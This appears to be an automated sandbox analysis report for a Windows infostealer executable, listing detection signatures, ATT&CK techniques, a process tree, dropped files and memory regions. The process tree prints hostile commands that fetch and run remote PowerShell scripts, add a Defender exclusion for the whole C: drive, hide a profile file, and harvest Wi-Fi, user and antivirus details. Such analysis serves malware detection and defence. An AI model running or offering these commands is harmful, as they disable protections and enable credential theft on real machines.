9a324052211fbf111e8ba4e3d71665a221f3c5a475524309bc705ee95310dc65

Analysis

max time kernel
133s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18/09/2024, 11:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe
Size

14.0MB
MD5

6568b9ffcb8c8d63bd8b066972d3798d
SHA1

5ea2b00be65494475b639c16fa8ab66590175a86
SHA256

9a324052211fbf111e8ba4e3d71665a221f3c5a475524309bc705ee95310dc65
SHA512

0ea1b1b39d110dbabe0e1adacb3eb1b467a333dd8b86ed6ad4ab8aef95478537a810ea3d4b5821579fa67eb2cf112308c1e16b9a744daaf184434ef205ea2186
SSDEEP

196608:LSG4xZcgzl5TDH6KbJLFfI6OB/zIf8ryQ5S:LYxt5/H6KbhFfpOlzIfxA

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	1092	powershell.exe
10	2780	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2780	powershell.exe
1092	powershell.exe
5016	PowerShell.exe
2000	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2908	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com
10	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
5056	ARP.EXE

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1804	netsh.exe
3652	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
2820	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4608	ipconfig.exe
2820	NETSTAT.EXE
5104	ipconfig.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1092	powershell.exe
5016	PowerShell.exe
2000	powershell.exe
2000	powershell.exe
1092	powershell.exe
2780	powershell.exe
2780	powershell.exe
5016	PowerShell.exe
2780	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	5016	PowerShell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: 33	3688	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3688	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	2780	powershell.exe
Token: SeSecurityPrivilege	2780	powershell.exe
Token: SeTakeOwnershipPrivilege	2780	powershell.exe
Token: SeLoadDriverPrivilege	2780	powershell.exe
Token: SeSystemProfilePrivilege	2780	powershell.exe
Token: SeSystemtimePrivilege	2780	powershell.exe
Token: SeProfSingleProcessPrivilege	2780	powershell.exe
Token: SeIncBasePriorityPrivilege	2780	powershell.exe
Token: SeCreatePagefilePrivilege	2780	powershell.exe
Token: SeBackupPrivilege	2780	powershell.exe
Token: SeRestorePrivilege	2780	powershell.exe
Token: SeShutdownPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeSystemEnvironmentPrivilege	2780	powershell.exe
Token: SeRemoteShutdownPrivilege	2780	powershell.exe
Token: SeUndockPrivilege	2780	powershell.exe
Token: SeManageVolumePrivilege	2780	powershell.exe
Token: 33	2780	powershell.exe
Token: 34	2780	powershell.exe
Token: 35	2780	powershell.exe
Token: 36	2780	powershell.exe
Token: SeIncreaseQuotaPrivilege	2780	powershell.exe
Token: SeSecurityPrivilege	2780	powershell.exe
Token: SeTakeOwnershipPrivilege	2780	powershell.exe
Token: SeLoadDriverPrivilege	2780	powershell.exe
Token: SeSystemProfilePrivilege	2780	powershell.exe
Token: SeSystemtimePrivilege	2780	powershell.exe
Token: SeProfSingleProcessPrivilege	2780	powershell.exe
Token: SeIncBasePriorityPrivilege	2780	powershell.exe
Token: SeCreatePagefilePrivilege	2780	powershell.exe
Token: SeBackupPrivilege	2780	powershell.exe
Token: SeRestorePrivilege	2780	powershell.exe
Token: SeShutdownPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeSystemEnvironmentPrivilege	2780	powershell.exe
Token: SeRemoteShutdownPrivilege	2780	powershell.exe
Token: SeUndockPrivilege	2780	powershell.exe
Token: SeManageVolumePrivilege	2780	powershell.exe
Token: 33	2780	powershell.exe
Token: 34	2780	powershell.exe
Token: 35	2780	powershell.exe
Token: 36	2780	powershell.exe
Token: SeIncreaseQuotaPrivilege	2780	powershell.exe
Token: SeSecurityPrivilege	2780	powershell.exe
Token: SeTakeOwnershipPrivilege	2780	powershell.exe
Token: SeLoadDriverPrivilege	2780	powershell.exe
Token: SeSystemProfilePrivilege	2780	powershell.exe
Token: SeSystemtimePrivilege	2780	powershell.exe
Token: SeProfSingleProcessPrivilege	2780	powershell.exe
Token: SeIncBasePriorityPrivilege	2780	powershell.exe
Token: SeCreatePagefilePrivilege	2780	powershell.exe
Token: SeBackupPrivilege	2780	powershell.exe
Token: SeRestorePrivilege	2780	powershell.exe
Token: SeShutdownPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeSystemEnvironmentPrivilege	2780	powershell.exe
Token: SeRemoteShutdownPrivilege	2780	powershell.exe
Token: SeUndockPrivilege	2780	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 2780	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	85
PID 2156 wrote to memory of 2780	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	85
PID 2156 wrote to memory of 1092	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	86
PID 2156 wrote to memory of 1092	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	86
PID 2156 wrote to memory of 4756	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	87
PID 2156 wrote to memory of 4756	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	87
PID 2156 wrote to memory of 2740	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	88
PID 2156 wrote to memory of 2740	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	88
PID 4756 wrote to memory of 4556	4756	cmd.exe	89
PID 4756 wrote to memory of 4556	4756	cmd.exe	89
PID 2156 wrote to memory of 5016	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	90
PID 2156 wrote to memory of 5016	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	90
PID 2156 wrote to memory of 2000	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	91
PID 2156 wrote to memory of 2000	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	91
PID 2156 wrote to memory of 1584	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	93
PID 2156 wrote to memory of 1584	2156	202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe	93
PID 1092 wrote to memory of 1368	1092	powershell.exe	94
PID 1092 wrote to memory of 1368	1092	powershell.exe	94
PID 2780 wrote to memory of 4732	2780	powershell.exe	95
PID 2780 wrote to memory of 4732	2780	powershell.exe	95
PID 1368 wrote to memory of 4396	1368	csc.exe	96
PID 1368 wrote to memory of 4396	1368	csc.exe	96
PID 4732 wrote to memory of 5092	4732	csc.exe	97
PID 4732 wrote to memory of 5092	4732	csc.exe	97
PID 2780 wrote to memory of 3652	2780	powershell.exe	99
PID 2780 wrote to memory of 3652	2780	powershell.exe	99
PID 2780 wrote to memory of 5072	2780	powershell.exe	101
PID 2780 wrote to memory of 5072	2780	powershell.exe	101
PID 5072 wrote to memory of 5096	5072	net.exe	102
PID 5072 wrote to memory of 5096	5072	net.exe	102
PID 2780 wrote to memory of 2908	2780	powershell.exe	103
PID 2780 wrote to memory of 2908	2780	powershell.exe	103
PID 2780 wrote to memory of 4460	2780	powershell.exe	104
PID 2780 wrote to memory of 4460	2780	powershell.exe	104
PID 2780 wrote to memory of 4560	2780	powershell.exe	105
PID 2780 wrote to memory of 4560	2780	powershell.exe	105
PID 4560 wrote to memory of 2884	4560	net.exe	106
PID 4560 wrote to memory of 2884	4560	net.exe	106
PID 2780 wrote to memory of 4608	2780	powershell.exe	109
PID 2780 wrote to memory of 4608	2780	powershell.exe	109
PID 2780 wrote to memory of 1216	2780	powershell.exe	110
PID 2780 wrote to memory of 1216	2780	powershell.exe	110
PID 1216 wrote to memory of 1204	1216	net.exe	111
PID 1216 wrote to memory of 1204	1216	net.exe	111
PID 2780 wrote to memory of 2180	2780	powershell.exe	112
PID 2780 wrote to memory of 2180	2780	powershell.exe	112
PID 2780 wrote to memory of 2820	2780	powershell.exe	113
PID 2780 wrote to memory of 2820	2780	powershell.exe	113
PID 2780 wrote to memory of 1776	2780	powershell.exe	114
PID 2780 wrote to memory of 1776	2780	powershell.exe	114
PID 2780 wrote to memory of 5104	2780	powershell.exe	115
PID 2780 wrote to memory of 5104	2780	powershell.exe	115
PID 2780 wrote to memory of 1720	2780	powershell.exe	116
PID 2780 wrote to memory of 1720	2780	powershell.exe	116
PID 2780 wrote to memory of 5056	2780	powershell.exe	117
PID 2780 wrote to memory of 5056	2780	powershell.exe	117
PID 2780 wrote to memory of 1804	2780	powershell.exe	118
PID 2780 wrote to memory of 1804	2780	powershell.exe	118

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1584	attrib.exe

C:\Users\Admin\AppData\Local\Temp\202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe
"C:\Users\Admin\AppData\Local\Temp\202409186568b9ffcb8c8d63bd8b066972d3798dpoetratsnatch.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w5401hgo\w5401hgo.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB680.tmp" "c:\Users\Admin\AppData\Local\Temp\w5401hgo\CSC3946CE46B6994E668FA5E8B17814654.TMP"
      4⤵
      PID:5092
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3652
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:5096
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2908
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:4460
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:2884
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:4608
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1216
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:1204
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:2180
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:2820
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:1776
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:5104
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:1720
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:5056
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1092
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rymwiahp\rymwiahp.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1368
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB67F.tmp" "c:\Users\Admin\AppData\Local\Temp\rymwiahp\CSCA5626877F5484D4EA5B673A9B6B13C55.TMP"
      4⤵
      PID:4396
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4756
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:4556
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:2740
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2000
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:1584

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x404 0x49c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d71c7d15748177ac7bda63669279b7bd

SHA1
927891cd898e24ccafa1c8dcb79853126953bd3e

SHA256
0f7d506057ea592aa234bc3e6982d2133e2dd3b67bf75678c8b4132f5b50972d

SHA512
fb410da790bdc39eb745c3fd35eb4c1ca2202ce88739ac80f3b061a650544991622512658e482eb124fa6c39ff99ccd95cad74e26dd7804c439dc7b9345ea2a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
502789a8235e033cb31752ce0b128048

SHA1
8767b3e9c4d6cccc62c362582672e55f2889b3aa

SHA256
8a63155ce461cce0cd6ce748834275d2fa4ef69708e5c6d6036fc6dd6b0d87e5

SHA512
2a85aa65035afd119cbb2747985271ed23ff24e2345b00be48b56091467a02df91aefc132cb364d77e51af653119a5f8d63dcec67d16ed9117206b16a58eae66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa683ba35bef5db77615e4281ba4c0fc

SHA1
e5d1b282d5160ccbc965b946bcbdaf27f99b0c2e

SHA256
d02a84de5459810a45b0434f93ecdb8413791c0ada1ae71210a92eed037538a6

SHA512
a181c916e3df8aefb8d458799e8aafb687007751a425bd288dfcd5de41c93529fde2dd5d6602a075e50f4f2f90886c9a2e6f7255b64325758ae5f355317a36e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB67F.tmp

Filesize
1KB

MD5
fc32887f366a25b582f48556d0a13bfb

SHA1
a9174ea8e27322010ae3b2f0ba3fa247994d1b5a

SHA256
51ed99aadfcddfde45547b19f09ff5fb26df0844fc116669b4db5a9807c57af8

SHA512
902ff6d6254d5d703513448bcfc59c37d1a31a16f1db1479922780b3b42bf4cb80230ea1a4878f9bce71f55fe0af37d5f338b669b9e60b4b5d4bd05dd95eb01a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB680.tmp

Filesize
1KB

MD5
1d440cc1c381baf12a88d8afa0831f17

SHA1
450c53ff68fd79496e5ac5f0e2e0da83471dd986

SHA256
f93e17270666d309ad20e24b2a621013b8de35efda5647e9981ab2400a502963

SHA512
527207794dbc4a13682e4f2193a5426df4037f7bdbda926b831bdcdfaa5b1af77d1df88893ca664b88bc6f385c578d85b89469a3ff83e8b94fe7b674d989f2f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
21KB

MD5
63e40e74c5491c711b07b6197c4bcd13

SHA1
4ed46b981204db283c44aecdfe6b2303b0719bc7

SHA256
ef632fb681b5c7e2513d3eadc757b5d5eb2b4acdf49c68f22222e3266acd045d

SHA512
194a84593973b7d0656f7c780b2daa991455f46e30a93303e54935b1747a454e40a079c5de8b2ad6285196d443de462262d5fd703806eee5ad241c0a8afe3fa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ai2pq1w.q1u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rymwiahp\rymwiahp.dll

Filesize
4KB

MD5
25ea611f1ea956cdd59eae8906081123

SHA1
f1fcb01106cdbf1d6f51dcb8fd08ec1c63e26212

SHA256
8186cff71427cbc6266266662f891e6c6c514afe740953e9fe0c4671eb8915eb

SHA512
f9be28e13a85af8adbab9b6f8ce972294d727e8c7c917f362f82cd317605da726032e417b40e0b451391f6c0a8c5e16340e7b3065dc5be0887603326c91e744a

Download Submit
C:\Users\Admin\AppData\Local\Temp\w5401hgo\w5401hgo.dll

Filesize
4KB

MD5
7243e0b14405a0024d65acbc50b77c5a

SHA1
94aa23aee284f5cfa2857b1683324340fb4017d6

SHA256
d7c906da478240fb8a54e5b3f8f291bfc7da9c70e167e7d8a2a6b1661b1787cd

SHA512
852e92c8139633ef2eb2afa71f3078e76511953f825e041d4e9fc17e06d08088d61876c1cca4d8c9fe9378079462b77d3c4786ae81e62d493fbf9863dbb605fb

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rymwiahp\CSCA5626877F5484D4EA5B673A9B6B13C55.TMP

Filesize
652B

MD5
2a725d39237766f63b7ad1bce4db1c20

SHA1
1fff7f0cd9d73f125be5646ffaf341c274503f86

SHA256
2c8a70af5ff2e0b22715c1ad7b7ba701e917dafa3c5abb5455bb1e570221208f

SHA512
b6d32c072cf540e590f155f109c07144319d2d9ba0173143ef52eadfe24cfbeecbdb445a48d999720c5f3e5d7b5feffea36373a432300ce435d6a2e2bd31af95

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rymwiahp\rymwiahp.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rymwiahp\rymwiahp.cmdline

Filesize
369B

MD5
cdf95f8687f5f90cee0f363fae1826b9

SHA1
9f7825fbbc0e59969bd6b5948655815b7f9fda7d

SHA256
01c886eec91ebe271a2d2e86628d1f324e426b68e7119640d85b200eb3651fbb

SHA512
32d84c0c4bf13556a9adf1e5ed0c8d4d509f4c0fb5a5c2b89d07afb291e7918412783c960885419e9e5be39b41aaa279f2fdef776f314dd8e913e06b2d5e06c8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w5401hgo\CSC3946CE46B6994E668FA5E8B17814654.TMP

Filesize
652B

MD5
406c1f9a52d9907354bd83eec1cb99d0

SHA1
8e1dd44182f18a9de4fce2f33f7700f0a7d8e808

SHA256
c92bb7bc14dfc724b0d7af77d54a9dc7d579c59a0e3ae7184d0f720c8e6c6fd4

SHA512
e707cbf2e115bdf4eca3b4e17ae409cb1f957b68b8f2d4df5d438749cb0136890acf698045058b0266d0d9f65cd7e142eac16e2a385ab31fd8e88e4572597711

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w5401hgo\w5401hgo.cmdline

Filesize
369B

MD5
781d896909c4fff360e7c2bcc6d6f08f

SHA1
1226c1e65e2cc79bafc315cff7b6a75255da611e

SHA256
37ad60e6578edbf2ab877031711434a4a92fd7912f1e0815d142c3fee5c30d9b

SHA512
45f9c616f2751233cbd64b413c0346c81bb48e39109709e9375f68e0cef6838586caccf7a4031376fd56abc7a33da2fb144bdea4a5e44a7cb05171d1dd3d27e4

Download Submit
memory/1092-65-0x0000024E6B4D0000-0x0000024E6B4D8000-memory.dmp

Filesize
32KB

Download
memory/1092-11-0x0000024E6B4E0000-0x0000024E6B502000-memory.dmp

Filesize
136KB

Download
memory/1092-12-0x00007FFAC6D50000-0x00007FFAC7811000-memory.dmp

Filesize
10.8MB

Download
memory/1092-81-0x00007FFAC6D50000-0x00007FFAC7811000-memory.dmp

Filesize
10.8MB

Download
memory/1092-0-0x00007FFAC6D53000-0x00007FFAC6D55000-memory.dmp

Filesize
8KB

Download
memory/1092-6-0x00007FFAC6D50000-0x00007FFAC7811000-memory.dmp

Filesize
10.8MB

Download
memory/2780-70-0x000002AD4D960000-0x000002AD4D968000-memory.dmp

Filesize
32KB

Download
memory/2780-85-0x000002AD66530000-0x000002AD66554000-memory.dmp

Filesize
144KB

Download
memory/2780-84-0x000002AD66530000-0x000002AD6655A000-memory.dmp

Filesize
168KB

Download
memory/2780-120-0x000002AD66530000-0x000002AD66542000-memory.dmp

Filesize
72KB

Download
memory/2780-121-0x000002AD66520000-0x000002AD6652A000-memory.dmp

Filesize
40KB

Download
memory/2780-75-0x000002AD66A40000-0x000002AD671E6000-memory.dmp

Filesize
7.6MB

Download